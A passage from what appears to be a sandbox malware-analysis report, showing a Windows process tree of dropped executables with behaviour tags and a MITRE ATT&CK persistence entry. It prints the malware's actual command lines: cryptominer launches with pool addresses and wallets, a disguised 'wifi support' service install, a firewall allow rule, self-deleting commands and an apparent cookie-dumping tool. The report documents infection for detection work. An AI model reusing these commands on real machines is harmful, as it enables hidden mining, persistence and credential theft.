                                                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pyfu2n1u.coo\inst.exe & exit
                                                                                                                6⤵
                                                                                                                  PID:4168
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\pyfu2n1u.coo\inst.exe
                                                                                                                    C:\Users\Admin\AppData\Local\Temp\pyfu2n1u.coo\inst.exe
                                                                                                                    7⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    PID:5604
                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\d2bhbmhx.sfe\c7ae36fa.exe & exit
                                                                                                                  6⤵
                                                                                                                    PID:5524
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\d2bhbmhx.sfe\c7ae36fa.exe
                                                                                                                      C:\Users\Admin\AppData\Local\Temp\d2bhbmhx.sfe\c7ae36fa.exe
                                                                                                                      7⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      • Loads dropped DLL
                                                                                                                      • Checks SCSI registry key(s)
                                                                                                                      • Suspicious behavior: MapViewOfSection
                                                                                                                      PID:5964
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe
                                                                                                            "C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe"
                                                                                                            2⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • Modifies system certificate store
                                                                                                            PID:4856
                                                                                                            • C:\Users\Admin\AppData\Roaming\3DCA.tmp.exe
                                                                                                              "C:\Users\Admin\AppData\Roaming\3DCA.tmp.exe"
                                                                                                              3⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • Suspicious use of SetThreadContext
                                                                                                              PID:4268
                                                                                                              • C:\Users\Admin\AppData\Roaming\3DCA.tmp.exe
                                                                                                                "C:\Users\Admin\AppData\Roaming\3DCA.tmp.exe"
                                                                                                                4⤵
                                                                                                                • Executes dropped EXE
                                                                                                                • Checks processor information in registry
                                                                                                                PID:5412
                                                                                                            • C:\Users\Admin\AppData\Roaming\404C.tmp.exe
                                                                                                              "C:\Users\Admin\AppData\Roaming\404C.tmp.exe"
                                                                                                              3⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • Adds Run key to start application
                                                                                                              • Suspicious use of SetThreadContext
                                                                                                              PID:4844
                                                                                                              • C:\Windows\system32\msiexec.exe
                                                                                                                -P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.w28348@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 99999
                                                                                                                4⤵
                                                                                                                  PID:4284
                                                                                                                • C:\Windows\system32\msiexec.exe
                                                                                                                  -o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8.w10628 --cpu-max-threads-hint 50 -r 9999
                                                                                                                  4⤵
                                                                                                                  • Blocklisted process makes network request
                                                                                                                  PID:5288
                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe"
                                                                                                                3⤵
                                                                                                                  PID:5156
                                                                                                                  • C:\Windows\SysWOW64\PING.EXE
                                                                                                                    ping 127.0.0.1
                                                                                                                    4⤵
                                                                                                                    • Runs ping.exe
                                                                                                                    PID:5588
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\jg6_6asg.exe
                                                                                                                "C:\Users\Admin\AppData\Local\Temp\RarSFX0\jg6_6asg.exe"
                                                                                                                2⤵
                                                                                                                • Executes dropped EXE
                                                                                                                • Checks whether UAC is enabled
                                                                                                                PID:5856
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\gaoou.exe
                                                                                                                "C:\Users\Admin\AppData\Local\Temp\RarSFX0\gaoou.exe"
                                                                                                                2⤵
                                                                                                                • Executes dropped EXE
                                                                                                                • Adds Run key to start application
                                                                                                                PID:5616
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                  3⤵
                                                                                                                    PID:3304
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                    3⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    PID:1680
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                    3⤵
                                                                                                                      PID:5220
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                      3⤵
                                                                                                                        PID:4440
                                                                                                                  • \??\c:\windows\system32\svchost.exe
                                                                                                                    c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                                                    1⤵
                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                    • Modifies data under HKEY_USERS
                                                                                                                    • Modifies registry class
                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                                    PID:3812
                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                      C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                      2⤵
                                                                                                                      • Drops file in System32 directory
                                                                                                                      • Checks processor information in registry
                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                      PID:2756
                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                    1⤵
                                                                                                                    • Drops file in Windows directory
                                                                                                                    • Modifies Internet Explorer settings
                                                                                                                    • Modifies registry class
                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                    PID:4360
                                                                                                                  • C:\Windows\system32\browser_broker.exe
                                                                                                                    C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                    1⤵
                                                                                                                    • Modifies Internet Explorer settings
                                                                                                                    PID:3832
                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                    1⤵
                                                                                                                      PID:4668
                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                      1⤵
                                                                                                                      • Modifies Internet Explorer settings
                                                                                                                      • Modifies registry class
                                                                                                                      PID:5056
                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                      1⤵
                                                                                                                      • Modifies registry class
                                                                                                                      PID:5948
                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                      1⤵
                                                                                                                      • Modifies registry class
                                                                                                                      PID:5728
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\A8C4.exe
                                                                                                                      C:\Users\Admin\AppData\Local\Temp\A8C4.exe
                                                                                                                      1⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                      PID:3704
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\AAC8.exe
                                                                                                                      C:\Users\Admin\AppData\Local\Temp\AAC8.exe
                                                                                                                      1⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                      PID:2212
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\BF1D.exe
                                                                                                                      C:\Users\Admin\AppData\Local\Temp\BF1D.exe
                                                                                                                      1⤵
                                                                                                                        PID:5236
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\C577.exe
                                                                                                                        C:\Users\Admin\AppData\Local\Temp\C577.exe
                                                                                                                        1⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                        PID:2200
                                                                                                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                          C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                          2⤵
                                                                                                                            PID:5996
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\CD57.exe
                                                                                                                          C:\Users\Admin\AppData\Local\Temp\CD57.exe
                                                                                                                          1⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          PID:5860
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\647349126.exe
                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\647349126.exe"
                                                                                                                            2⤵
                                                                                                                              PID:4372
                                                                                                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                3⤵
                                                                                                                                • Executes dropped EXE
                                                                                                                                PID:3304
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\1371397063.exe
                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\1371397063.exe"
                                                                                                                              2⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                              PID:3824
                                                                                                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                3⤵
                                                                                                                                  PID:5248
                                                                                                                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                  C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                  3⤵
                                                                                                                                    PID:5476
                                                                                                                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                    C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                    3⤵
                                                                                                                                      PID:5872
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\CFBA.exe
                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\CFBA.exe
                                                                                                                                  1⤵
                                                                                                                                    PID:1464
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\D21C.exe
                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\D21C.exe
                                                                                                                                    1⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    PID:5592
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\D8E3.exe
                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\D8E3.exe
                                                                                                                                    1⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    PID:5956
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\E076.exe
                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\E076.exe
                                                                                                                                    1⤵
                                                                                                                                      PID:4380
                                                                                                                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                        2⤵
                                                                                                                                          PID:5504
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\E922.exe
                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\E922.exe
                                                                                                                                        1⤵
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        PID:2064
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\F20C.exe
                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\F20C.exe
                                                                                                                                        1⤵
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        PID:1364
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\FB63.exe
                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\FB63.exe
                                                                                                                                        1⤵
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                        PID:4832
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\FB63.exe
                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\FB63.exe"
                                                                                                                                          2⤵
                                                                                                                                            PID:2260
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\19E.exe
                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\19E.exe
                                                                                                                                          1⤵
                                                                                                                                          • Executes dropped EXE
                                                                                                                                          PID:5388
                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                            "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\jqukbdmd\
                                                                                                                                            2⤵
                                                                                                                                              PID:5156
                                                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                3⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                                PID:4372
                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                              "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\toskalnl.exe" C:\Windows\SysWOW64\jqukbdmd\
                                                                                                                                              2⤵
                                                                                                                                                PID:4920
                                                                                                                                              • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                "C:\Windows\System32\sc.exe" create jqukbdmd binPath= "C:\Windows\SysWOW64\jqukbdmd\toskalnl.exe /d\"C:\Users\Admin\AppData\Local\Temp\19E.exe\"" type= own start= auto DisplayName= "wifi support"
                                                                                                                                                2⤵
                                                                                                                                                  PID:5328
                                                                                                                                                • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                  "C:\Windows\System32\sc.exe" description jqukbdmd "wifi internet conection"
                                                                                                                                                  2⤵
                                                                                                                                                    PID:5348
                                                                                                                                                  • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                    "C:\Windows\System32\sc.exe" start jqukbdmd
                                                                                                                                                    2⤵
                                                                                                                                                      PID:2172
                                                                                                                                                    • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                      "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                                                                                                                                                      2⤵
                                                                                                                                                        PID:5984
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\307.exe
                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\307.exe
                                                                                                                                                      1⤵
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      PID:6012
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\1603.exe
                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\1603.exe
                                                                                                                                                      1⤵
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                                      PID:4988
                                                                                                                                                      • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                        "C:\Windows\SysWOW64\explorer.exe"
                                                                                                                                                        2⤵
                                                                                                                                                          PID:3992
                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\6AFB.tmp.exe
                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\6AFB.tmp.exe"
                                                                                                                                                            3⤵
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            PID:4948
                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Remove.bat" "4948" "C:\Users\Admin\AppData\Roaming\6AFB.tmp.exe""
                                                                                                                                                              4⤵
                                                                                                                                                                PID:2716
                                                                                                                                                                • C:\Windows\system32\taskkill.exe
                                                                                                                                                                  taskkill /F /PID "4948"
                                                                                                                                                                  5⤵
                                                                                                                                                                  • Kills process with taskkill
                                                                                                                                                                  PID:2188
                                                                                                                                                                • C:\Windows\system32\choice.exe
                                                                                                                                                                  choice /C Y /N /D Y /T 3
                                                                                                                                                                  5⤵
                                                                                                                                                                    PID:6092
                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\6C53.tmp.exe
                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\6C53.tmp.exe"
                                                                                                                                                                3⤵
                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                PID:3980
                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\6D10.tmp.exe
                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\6D10.tmp.exe"
                                                                                                                                                                3⤵
                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                                                PID:2900
                                                                                                                                                                • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                  "C:\Windows\SysWOW64\explorer.exe"
                                                                                                                                                                  4⤵
                                                                                                                                                                    PID:776
                                                                                                                                                                  • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                    "C:\Windows\SysWOW64\explorer.exe"
                                                                                                                                                                    4⤵
                                                                                                                                                                    • Drops startup file
                                                                                                                                                                    PID:5460
                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                  "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Windows\SysWOW64\explorer.exe" >> NUL
                                                                                                                                                                  3⤵
                                                                                                                                                                    PID:4656
                                                                                                                                                                    • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                      ping 127.0.0.1
                                                                                                                                                                      4⤵
                                                                                                                                                                      • Runs ping.exe
                                                                                                                                                                      PID:5728
                                                                                                                                                              • C:\Windows\SysWOW64\jqukbdmd\toskalnl.exe
                                                                                                                                                                C:\Windows\SysWOW64\jqukbdmd\toskalnl.exe /d"C:\Users\Admin\AppData\Local\Temp\19E.exe"
                                                                                                                                                                1⤵
                                                                                                                                                                  PID:5868
                                                                                                                                                                  • C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                    svchost.exe
                                                                                                                                                                    2⤵
                                                                                                                                                                    • Drops file in System32 directory
                                                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                                                    • Modifies data under HKEY_USERS
                                                                                                                                                                    PID:4808
                                                                                                                                                                    • C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                      svchost.exe -o masari.miner.rocks:30162 -u 9rqX2BQ6Z4teAkaSqGBWvPZEM7bAtidewXXjYz86pVgKUQqDHeUqjy55fXt2fJAaJkPBteXWhptFqJVSr132QxsSSGfMCgw.50000 -p w=a -k -a cn/half
                                                                                                                                                                      3⤵
                                                                                                                                                                        PID:5372
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\1CDA.exe
                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\1CDA.exe
                                                                                                                                                                    1⤵
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                    PID:1836
                                                                                                                                                                  • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                    C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                    1⤵
                                                                                                                                                                      PID:4488
                                                                                                                                                                    • C:\Windows\explorer.exe
                                                                                                                                                                      C:\Windows\explorer.exe
                                                                                                                                                                      1⤵
                                                                                                                                                                        PID:2696
                                                                                                                                                                      • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                        C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                        1⤵
                                                                                                                                                                          PID:4476
                                                                                                                                                                        • C:\Windows\explorer.exe
                                                                                                                                                                          C:\Windows\explorer.exe
                                                                                                                                                                          1⤵
                                                                                                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                                                                                                          PID:4360
                                                                                                                                                                        • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                          C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                          1⤵
                                                                                                                                                                            PID:5644
                                                                                                                                                                          • C:\Windows\explorer.exe
                                                                                                                                                                            C:\Windows\explorer.exe
                                                                                                                                                                            1⤵
                                                                                                                                                                            • Suspicious behavior: MapViewOfSection
                                                                                                                                                                            PID:1940
                                                                                                                                                                          • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                            C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                            1⤵
                                                                                                                                                                              PID:4212
                                                                                                                                                                            • C:\Windows\explorer.exe
                                                                                                                                                                              C:\Windows\explorer.exe
                                                                                                                                                                              1⤵
                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                              • Suspicious behavior: MapViewOfSection
                                                                                                                                                                              PID:3828
                                                                                                                                                                            • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                              C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                              1⤵
                                                                                                                                                                                PID:5540
                                                                                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                                                                                C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                                                                                                1⤵
                                                                                                                                                                                  PID:1004
                                                                                                                                                                                • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                  c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                                                                                                                                                                  1⤵
                                                                                                                                                                                    PID:1200
                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                    1⤵
                                                                                                                                                                                    • Drops file in Windows directory
                                                                                                                                                                                    • Modifies registry class
                                                                                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                    PID:5944
                                                                                                                                                                                  • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                    C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                    1⤵
                                                                                                                                                                                    • Modifies Internet Explorer settings
                                                                                                                                                                                    PID:5264
                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                    1⤵
                                                                                                                                                                                    • Modifies registry class
                                                                                                                                                                                    • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                    PID:5664
                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                    1⤵
                                                                                                                                                                                    • Modifies registry class
                                                                                                                                                                                    PID:2196
                                                                                                                                                                                    • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                      C:\Windows\system32\WerFault.exe -u -p 2196 -s 1736
                                                                                                                                                                                      2⤵
                                                                                                                                                                                      • Program crash
                                                                                                                                                                                      PID:5708
                                                                                                                                                                                    • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                      C:\Windows\system32\WerFault.exe -u -p 2196 -s 3112
                                                                                                                                                                                      2⤵
                                                                                                                                                                                      • Program crash
                                                                                                                                                                                      • Checks processor information in registry
                                                                                                                                                                                      • Enumerates system info in registry
                                                                                                                                                                                      PID:3344
                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                    1⤵
                                                                                                                                                                                    • Modifies registry class
                                                                                                                                                                                    PID:2644
                                                                                                                                                                                    • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                      C:\Windows\system32\WerFault.exe -u -p 2644 -s 3180
                                                                                                                                                                                      2⤵
                                                                                                                                                                                      • Program crash
                                                                                                                                                                                      • Checks processor information in registry
                                                                                                                                                                                      • Enumerates system info in registry
                                                                                                                                                                                      PID:5416
                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                    1⤵
                                                                                                                                                                                    • Modifies registry class
                                                                                                                                                                                    PID:3336
                                                                                                                                                                                    • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                      C:\Windows\system32\WerFault.exe -u -p 3336 -s 2988
                                                                                                                                                                                      2⤵
                                                                                                                                                                                      • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                      • Program crash
                                                                                                                                                                                      • Checks processor information in registry
                                                                                                                                                                                      • Enumerates system info in registry
                                                                                                                                                                                      PID:4656
                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                    1⤵
                                                                                                                                                                                      PID:2356
                                                                                                                                                                                      • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                        C:\Windows\system32\WerFault.exe -u -p 2356 -s 2932
                                                                                                                                                                                        2⤵
                                                                                                                                                                                        • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                        • Program crash
                                                                                                                                                                                        • Checks processor information in registry
                                                                                                                                                                                        • Enumerates system info in registry
                                                                                                                                                                                        PID:2636
                                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                      1⤵
                                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                                      PID:416
                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\6F6E.exe
                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\6F6E.exe
                                                                                                                                                                                      1⤵
                                                                                                                                                                                        PID:4604
                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\SETUP.exe
                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\SETUP.exe"
                                                                                                                                                                                          2⤵
                                                                                                                                                                                            PID:3668
                                                                                                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                                                                                                          C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                                                                                                          1⤵
                                                                                                                                                                                            PID:5112
                                                                                                                                                                                          • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                            c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                                                                                                                                                                            1⤵
                                                                                                                                                                                              PID:5308

                                                                                                                                                                                            Network

                                                                                                                                                                                            MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                                            Persistence

                                                                                                                                                                                            New Service

                                                                                                                                                                                            1
                                                                                                                                                                                            T1050

